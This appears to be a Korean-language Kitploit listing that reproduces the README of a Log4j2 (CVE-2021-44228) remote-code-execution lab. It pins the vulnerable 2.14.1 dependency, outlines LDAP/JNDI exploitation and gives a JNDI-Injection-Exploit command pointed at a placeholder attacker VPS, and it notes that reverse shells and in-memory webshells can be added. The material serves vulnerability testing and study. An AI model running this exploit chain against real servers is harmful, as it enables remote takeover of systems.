Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Apache-Log4j2-RCE — Apache Log4j2 RCE( CVE-2021-44228) 검증 환경 | Kitploit
도구/GitHubGitHub/1in9e/apache-log4j2-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHub1in9e/apache-log4j2-rce

Apache-Log4j2-RCE

Apache Log4j2 RCE( CVE-2021-44228) 검증 환경

저장소 보기
214년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Apache Log4j2 RCE 검증 환경

2021.12.09부터

참고

https://mp.weixin.qq.com/s/yck74F9p9QhVw_3ykzVoSg

환경 구축

maven으로 관련 패키지 및 취약점 버전 범위 포함

root@kitploit:~
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.1</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.1</version>
        </dependency>

0

확인

dnslog를 사용하여 사용 여부 탐지

0

ldap 및 jndi를 통한 RCE 활용

jdk 버전 관련, JDK 11.0.1, 8u191, 7u201, 6u211 이후에는 수동으로 trustURLCodebase를 true로 설정해야 함

자세한 학습은 https://blog.0kami.cn/2020/03/01/java/jndi-with-ldap/ 참조

활용 방식: jndi 주입 도구와 결합 가능, 예: JNDI-Injection-Exploit 、fastjson_rce_tool 、 JNDIExploit

또한 도구를 결합하여 다양한 공개된 리버스 쉘 방식 및 메모리 말 주입 방식을 구현할 수 있음

root@kitploit:~
# 
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open -a /System/Applications/Calculator.app"  -A your_vps_ip

1

Web

TODO

3

정보

https://github.com/apache/logging-log4j2/tags

도구 다운로드